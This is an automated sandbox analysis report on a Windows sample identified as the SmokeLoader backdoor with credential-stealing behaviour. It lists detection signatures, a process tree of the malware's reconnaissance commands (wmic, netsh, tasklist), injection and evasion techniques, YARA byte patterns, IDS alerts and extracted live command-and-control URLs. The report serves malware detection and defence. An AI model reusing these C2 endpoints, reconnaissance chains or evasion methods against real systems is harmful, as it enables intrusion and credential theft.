Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
O4zPA1oI9Y.exe

Overview

General Information

Sample name:O4zPA1oI9Y.exe
renamed because original name is a hash value
Original sample name:2942cb9fca04e939af4ed1eef717e123.exe
Analysis ID:1529186
MD5:2942cb9fca04e939af4ed1eef717e123
SHA1:1bc59ca5e75f717dcd23b73634910b35314bcdee
SHA256:a76320bf90703f6591b6ec9a66522652c04ea3d87ed57f906cf0f8db209cb4c3
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • O4zPA1oI9Y.exe (PID: 2924 cmdline: "C:\Users\user\Desktop\O4zPA1oI9Y.exe" MD5: 2942CB9FCA04E939AF4ED1EEF717E123)
    • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • DE97.exe (PID: 5780 cmdline: C:\Users\user\AppData\Local\Temp\DE97.exe MD5: 1096F19319B5C475C2A12B8D0CC4022D)
      • 8CAE.exe (PID: 5144 cmdline: C:\Users\user\AppData\Local\Temp\8CAE.exe MD5: 65AEAA0A0849CB3CE9BC15BCBF0B7B9F)
        • cmd.exe (PID: 6360 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 3060 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6720 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5336 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 4608 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1444 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1432 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1912 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3532 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2616 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 368 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3796 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6688 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1120 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3764 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • ipconfig.exe (PID: 3580 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • ROUTE.EXE (PID: 3264 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
          • netsh.exe (PID: 5952 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • systeminfo.exe (PID: 3112 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • tasklist.exe (PID: 1020 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • explorer.exe (PID: 3536 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 1908 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 6316 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 2736 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 1600 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 3488 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • jvgasii (PID: 7004 cmdline: C:\Users\user\AppData\Roaming\jvgasii MD5: 2942CB9FCA04E939AF4ED1EEF717E123)
  • uegasii (PID: 6104 cmdline: C:\Users\user\AppData\Roaming\uegasii MD5: 1096F19319B5C475C2A12B8D0CC4022D)
  • msiexec.exe (PID: 4852 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x39d9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000A.00000002.3040636907.0000000000600000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000A.00000002.3041248373.0000000000743000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x3bdc:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    Click to see the 24 entries

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Execution of Suspicious File Type Extension
    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\jvgasii, CommandLine: C:\Users\user\AppData\Roaming\jvgasii, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jvgasii, NewProcessName: C:\Users\user\AppData\Roaming\jvgasii, OriginalFileName: C:\Users\user\AppData\Roaming\jvgasii, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\jvgasii, ProcessId: 7004, ProcessName: jvgasii
    Sigma detected: Local Accounts Discovery
    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6360, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 3796, ProcessName: WMIC.exe
    Sigma detected: Suspicious Network Command
    Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6360, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 3264, ProcessName: ROUTE.EXE

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T18:23:27.750526+020020391031A Network Trojan was detected192.168.2.649836160.177.223.16580TCP
    2024-10-08T18:23:28.876636+020020391031A Network Trojan was detected192.168.2.649842160.177.223.16580TCP
    2024-10-08T18:23:29.764123+020020391031A Network Trojan was detected192.168.2.649843160.177.223.16580TCP
    2024-10-08T18:23:31.473826+020020391031A Network Trojan was detected192.168.2.661260160.177.223.16580TCP
    2024-10-08T18:23:32.363126+020020391031A Network Trojan was detected192.168.2.661270160.177.223.16580TCP
    2024-10-08T18:23:33.235140+020020391031A Network Trojan was detected192.168.2.661279160.177.223.16580TCP
    2024-10-08T18:23:36.225749+020020391031A Network Trojan was detected192.168.2.661297160.177.223.16580TCP
    2024-10-08T18:23:37.095845+020020391031A Network Trojan was detected192.168.2.661302160.177.223.16580TCP
    2024-10-08T18:23:38.050287+020020391031A Network Trojan was detected192.168.2.661308160.177.223.16580TCP
    2024-10-08T18:23:38.944473+020020391031A Network Trojan was detected192.168.2.661315160.177.223.16580TCP
    2024-10-08T18:23:40.657509+020020391031A Network Trojan was detected192.168.2.661321160.177.223.16580TCP
    2024-10-08T18:23:41.860681+020020391031A Network Trojan was detected192.168.2.661327160.177.223.16580TCP
    2024-10-08T18:23:42.740213+020020391031A Network Trojan was detected192.168.2.661334160.177.223.16580TCP
    2024-10-08T18:23:43.610880+020020391031A Network Trojan was detected192.168.2.661340160.177.223.16580TCP
    2024-10-08T18:23:44.513005+020020391031A Network Trojan was detected192.168.2.661347160.177.223.16580TCP
    2024-10-08T18:23:45.415476+020020391031A Network Trojan was detected192.168.2.661355160.177.223.16580TCP
    2024-10-08T18:23:46.357847+020020391031A Network Trojan was detected192.168.2.661360160.177.223.16580TCP
    2024-10-08T18:23:47.252091+020020391031A Network Trojan was detected192.168.2.661365160.177.223.16580TCP
    2024-10-08T18:23:48.814052+020020391031A Network Trojan was detected192.168.2.661370160.177.223.16580TCP
    2024-10-08T18:23:49.702109+020020391031A Network Trojan was detected192.168.2.661375160.177.223.16580TCP
    2024-10-08T18:23:50.575715+020020391031A Network Trojan was detected192.168.2.661382160.177.223.16580TCP
    2024-10-08T18:23:51.441127+020020391031A Network Trojan was detected192.168.2.661388160.177.223.16580TCP
    2024-10-08T18:23:52.527195+020020391031A Network Trojan was detected192.168.2.661397160.177.223.16580TCP
    2024-10-08T18:23:53.404922+020020391031A Network Trojan was detected192.168.2.661404160.177.223.16580TCP
    2024-10-08T18:23:55.559019+020020391031A Network Trojan was detected192.168.2.661419160.177.223.16580TCP
    2024-10-08T18:23:56.454433+020020391031A Network Trojan was detected192.168.2.661424160.177.223.16580TCP
    2024-10-08T18:23:57.351748+020020391031A Network Trojan was detected192.168.2.661425160.177.223.16580TCP
    2024-10-08T18:23:58.386607+020020391031A Network Trojan was detected192.168.2.661426160.177.223.16580TCP
    2024-10-08T18:23:59.891018+020020391031A Network Trojan was detected192.168.2.661427160.177.223.16580TCP
    2024-10-08T18:24:00.795610+020020391031A Network Trojan was detected192.168.2.661428160.177.223.16580TCP
    2024-10-08T18:24:01.754405+020020391031A Network Trojan was detected192.168.2.661429160.177.223.16580TCP
    2024-10-08T18:24:02.629838+020020391031A Network Trojan was detected192.168.2.661430160.177.223.16580TCP
    2024-10-08T18:24:20.366638+020020391031A Network Trojan was detected192.168.2.66143323.145.40.168443TCP
    2024-10-08T18:24:21.816752+020020391031A Network Trojan was detected192.168.2.66143423.145.40.168443TCP
    2024-10-08T18:24:22.716146+020020391031A Network Trojan was detected192.168.2.66143523.145.40.168443TCP
    2024-10-08T18:24:23.603368+020020391031A Network Trojan was detected192.168.2.66143623.145.40.168443TCP
    2024-10-08T18:24:24.559269+020020391031A Network Trojan was detected192.168.2.66143723.145.40.168443TCP
    2024-10-08T18:24:25.495258+020020391031A Network Trojan was detected192.168.2.66143823.145.40.168443TCP
    2024-10-08T18:24:27.083217+020020391031A Network Trojan was detected192.168.2.66143923.145.40.168443TCP
    2024-10-08T18:24:28.004185+020020391031A Network Trojan was detected192.168.2.66144023.145.40.168443TCP
    2024-10-08T18:24:28.889008+020020391031A Network Trojan was detected192.168.2.66144123.145.40.168443TCP
    2024-10-08T18:24:29.775842+020020391031A Network Trojan was detected192.168.2.66144223.145.40.168443TCP
    2024-10-08T18:24:30.682604+020020391031A Network Trojan was detected192.168.2.66144323.145.40.168443TCP
    2024-10-08T18:24:31.837606+020020391031A Network Trojan was detected192.168.2.66144423.145.40.168443TCP
    2024-10-08T18:24:32.735891+020020391031A Network Trojan was detected192.168.2.66144523.145.40.168443TCP
    2024-10-08T18:24:33.708055+020020391031A Network Trojan was detected192.168.2.66144623.145.40.168443TCP
    2024-10-08T18:24:35.121047+020020391031A Network Trojan was detected192.168.2.66144723.145.40.168443TCP
    2024-10-08T18:24:36.013059+020020391031A Network Trojan was detected192.168.2.66144823.145.40.168443TCP
    2024-10-08T18:24:36.915028+020020391031A Network Trojan was detected192.168.2.66144923.145.40.168443TCP
    2024-10-08T18:24:38.479188+020020391031A Network Trojan was detected192.168.2.66145023.145.40.168443TCP
    2024-10-08T18:24:39.402725+020020391031A Network Trojan was detected192.168.2.66145123.145.40.168443TCP
    2024-10-08T18:24:40.283939+020020391031A Network Trojan was detected192.168.2.66145223.145.40.168443TCP
    2024-10-08T18:24:46.922823+020020391031A Network Trojan was detected192.168.2.66145423.145.40.168443TCP
    2024-10-08T18:25:09.724772+020020391031A Network Trojan was detected192.168.2.661455160.177.223.16580TCP
    2024-10-08T18:25:11.261402+020020391031A Network Trojan was detected192.168.2.661456160.177.223.16580TCP
    2024-10-08T18:25:17.849622+020020391031A Network Trojan was detected192.168.2.661457160.177.223.16580TCP
    2024-10-08T18:25:25.694218+020020391031A Network Trojan was detected192.168.2.661458160.177.223.16580TCP
    2024-10-08T18:25:34.893758+020020391031A Network Trojan was detected192.168.2.661459160.177.223.16580TCP
    2024-10-08T18:25:46.638196+020020391031A Network Trojan was detected192.168.2.661461160.177.223.16580TCP
    2024-10-08T18:25:59.919254+020020391031A Network Trojan was detected192.168.2.661462160.177.223.16580TCP
    2024-10-08T18:26:00.552603+020020391031A Network Trojan was detected192.168.2.66146323.145.40.168443TCP
    2024-10-08T18:26:17.303628+020020391031A Network Trojan was detected192.168.2.66146523.145.40.168443TCP
    2024-10-08T18:26:17.380497+020020391031A Network Trojan was detected192.168.2.661464190.249.249.1480TCP
    2024-10-08T18:26:36.769052+020020391031A Network Trojan was detected192.168.2.661466190.249.249.1480TCP
    2024-10-08T18:26:37.622347+020020391031A Network Trojan was detected192.168.2.66146723.145.40.168443TCP
    2024-10-08T18:26:55.070440+020020391031A Network Trojan was detected192.168.2.661469190.249.249.1480TCP
    2024-10-08T18:26:56.007175+020020391031A Network Trojan was detected192.168.2.66147023.145.40.168443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T18:24:20.818347+020028098821Malware Command and Control Activity Detected192.168.2.66143323.145.40.168443TCP
    2024-10-08T18:24:22.092535+020028098821Malware Command and Control Activity Detected192.168.2.66143423.145.40.168443TCP
    2024-10-08T18:24:23.001256+020028098821Malware Command and Control Activity Detected192.168.2.66143523.145.40.168443TCP
    2024-10-08T18:24:23.881130+020028098821Malware Command and Control Activity Detected192.168.2.66143623.145.40.168443TCP
    2024-10-08T18:24:24.867432+020028098821Malware Command and Control Activity Detected192.168.2.66143723.145.40.168443TCP
    2024-10-08T18:24:26.230287+020028098821Malware Command and Control Activity Detected192.168.2.66143823.145.40.168443TCP
    2024-10-08T18:24:27.381937+020028098821Malware Command and Control Activity Detected192.168.2.66143923.145.40.168443TCP
    2024-10-08T18:24:28.284963+020028098821Malware Command and Control Activity Detected192.168.2.66144023.145.40.168443TCP
    2024-10-08T18:24:29.177525+020028098821Malware Command and Control Activity Detected192.168.2.66144123.145.40.168443TCP
    2024-10-08T18:24:30.062705+020028098821Malware Command and Control Activity Detected192.168.2.66144223.145.40.168443TCP
    2024-10-08T18:24:30.976278+020028098821Malware Command and Control Activity Detected192.168.2.66144323.145.40.168443TCP
    2024-10-08T18:24:32.127269+020028098821Malware Command and Control Activity Detected192.168.2.66144423.145.40.168443TCP
    2024-10-08T18:24:33.084547+020028098821Malware Command and Control Activity Detected192.168.2.66144523.145.40.168443TCP
    2024-10-08T18:24:34.334207+020028098821Malware Command and Control Activity Detected192.168.2.66144623.145.40.168443TCP
    2024-10-08T18:24:35.402522+020028098821Malware Command and Control Activity Detected192.168.2.66144723.145.40.168443TCP
    2024-10-08T18:24:36.310731+020028098821Malware Command and Control Activity Detected192.168.2.66144823.145.40.168443TCP
    2024-10-08T18:24:37.202175+020028098821Malware Command and Control Activity Detected192.168.2.66144923.145.40.168443TCP
    2024-10-08T18:24:38.785716+020028098821Malware Command and Control Activity Detected192.168.2.66145023.145.40.168443TCP
    2024-10-08T18:24:39.673217+020028098821Malware Command and Control Activity Detected192.168.2.66145123.145.40.168443TCP
    2024-10-08T18:24:40.573653+020028098821Malware Command and Control Activity Detected192.168.2.66145223.145.40.168443TCP
    2024-10-08T18:24:47.342548+020028098821Malware Command and Control Activity Detected192.168.2.66145423.145.40.168443TCP
    2024-10-08T18:26:01.029765+020028098821Malware Command and Control Activity Detected192.168.2.66146323.145.40.168443TCP
    2024-10-08T18:26:17.815560+020028098821Malware Command and Control Activity Detected192.168.2.66146523.145.40.168443TCP
    2024-10-08T18:26:37.988810+020028098821Malware Command and Control Activity Detected192.168.2.66146723.145.40.168443TCP
    2024-10-08T18:26:56.524821+020028098821Malware Command and Control Activity Detected192.168.2.66147023.145.40.168443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T18:24:20.948318+020028298482Potentially Bad Traffic23.145.40.168443192.168.2.661433TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: O4zPA1oI9Y.exeAvira: detected
    Antivirus detection for dropped file
    Source: C:\Users\user\AppData\Roaming\jvgasiiAvira: detection malicious, Label: HEUR/AGEN.1312571
    Found malware configuration
    Source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeReversingLabs: Detection: 42%
    Source: C:\Users\user\AppData\Roaming\jvgasiiReversingLabs: Detection: 78%
    Multi AV Scanner detection for submitted file
    Source: O4zPA1oI9Y.exeReversingLabs: Detection: 78%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for dropped file
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Roaming\jvgasiiJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Roaming\uegasiiJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeJoe Sandbox ML: detected
    Machine Learning detection for sample
    Source: O4zPA1oI9Y.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCA36F0 CryptExportKey,CryptExportKey,11_2_00007FF7CBCA36F0
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCA3220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,11_2_00007FF7CBCA3220
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00433098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,13_2_00433098
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00433717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,13_2_00433717
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00433E04 RtlCompareMemory,CryptUnprotectData,13_2_00433E04
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_004311E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,13_2_004311E1
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00431198 CryptBinaryToStringA,CryptBinaryToStringA,13_2_00431198
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0043123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,13_2_0043123B
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00431FCE CryptUnprotectData,RtlMoveMemory,13_2_00431FCE
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F0263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,16_2_02F0263E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F0245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,16_2_02F0245E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F02404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,16_2_02F02404
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00472799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,18_2_00472799
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_004725A4 CryptBinaryToStringA,CryptBinaryToStringA,18_2_004725A4
    Source: O4zPA1oI9Y.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.6:61410 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61433 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61434 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61435 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61436 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61437 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61438 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61439 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61440 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61441 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61442 version: TLS 1.2
